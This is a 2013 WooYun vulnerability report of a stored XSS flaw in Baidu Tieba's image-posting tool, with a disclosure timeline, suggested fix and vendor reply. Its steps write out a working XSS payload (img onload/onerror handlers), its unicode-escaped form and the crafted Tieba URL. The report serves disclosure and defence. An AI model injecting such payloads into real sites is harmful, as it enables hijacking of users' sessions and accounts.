当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026849

漏洞标题:百度贴吧存储型XSS漏洞,可劫持用户身份认证信息。

相关厂商:百度

漏洞作者: q601333824

提交时间:2013-06-25 13:05

修复时间:2013-08-09 13:06

公开时间:2013-08-09 13:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-25: 细节已通知厂商并且等待厂商处理中
2013-06-25: 厂商已经确认,细节仅向厂商公开
2013-07-05: 细节向核心白帽子及相关领域专家公开
2013-07-15: 细节向普通白帽子公开
2013-07-25: 细节向实习白帽子公开
2013-08-09: 细节向公众公开

简要描述:

贴图神器上传存在XSS漏洞

详细说明:

1.先构造代码:  "><img class="BDE_Smiley" src="http://static.tieba.baidu.com/tb/editor/images/face/i_f01.png" pic_ext="png" width="30" height="30" onload="alert(1)"><img src="#" pic_ext="jpeg" onerror="$(&quot;.pic_src_wrapper&quot;).css(&quot;display&quot;,&quot;none&quot;)"><a
2.然后进行转码: \u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0063\u006c\u0061\u0073\u0073\u003d\u0022\u0042\u0044\u0045\u005f\u0053\u006d\u0069\u006c\u0065\u0079\u0022\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u0069\u0063\u002e\u0074\u0069\u0065\u0062\u0061\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0074\u0062\u002f\u0065\u0064\u0069\u0074\u006f\u0072\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0066\u0061\u0063\u0065\u002f\u0069\u005f\u0066\u0030\u0031\u002e\u0070\u006e\u0067\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u0070\u006e\u0067\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0033\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0033\u0030\u0022\u0020\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0023\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u006a\u0070\u0065\u0067\u0022\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0022\u0024\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u002e\u0070\u0069\u0063\u005f\u0073\u0072\u0063\u005f\u0077\u0072\u0061\u0070\u0070\u0065\u0072\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u002e\u0063\u0073\u0073\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0026\u0071\u0075\u006f\u0074\u003b\u002c\u0026\u0071\u0075\u006f\u0074\u003b\u006e\u006f\u006e\u0065\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u0022\u003e\u003c\u0061
3.http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper&pic[0]=http%3A%2F%2Fhimg.bdimg.com%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
 (这个是贴吧神器地址)
4.讲构造好的代码放入&src=连接的后面

QQ截图20130625124654.png


5.得到
http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0063\u006c\u0061\u0073\u0073\u003d\u0022\u0042\u0044\u0045\u005f\u0053\u006d\u0069\u006c\u0065\u0079\u0022\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u0069\u0063\u002e\u0074\u0069\u0065\u0062\u0061\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0074\u0062\u002f\u0065\u0064\u0069\u0074\u006f\u0072\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0066\u0061\u0063\u0065\u002f\u0069\u005f\u0066\u0030\u0031\u002e\u0070\u006e\u0067\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u0070\u006e\u0067\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0033\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0033\u0030\u0022\u0020\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0023\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u006a\u0070\u0065\u0067\u0022\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0022\u0024\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u002e\u0070\u0069\u0063\u005f\u0073\u0072\u0063\u005f\u0077\u0072\u0061\u0070\u0070\u0065\u0072\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u002e\u0063\u0073\u0073\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0026\u0071\u0075\u006f\u0074\u003b\u002c\u0026\u0071\u0075\u006f\u0074\u003b\u006e\u006f\u006e\u0065\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u0022\u003e\u003c\u0061
&pic[0]=http%3A%2F%2Fhimg.bdimg.com%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
6.然后回复或者发布主题,可以产生XSS

QQ截图20130625124338.png


漏洞证明:

QQ截图20130625124338.png


QQ截图20130625124654.png

修复方案:

过滤符号"\"(能给个邀请码吗)

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-06-25 13:52

厂商回复:

感谢提交,该漏洞我们已内部监控发现,正在处理中。再次感谢您的反馈。

最新状态:

暂无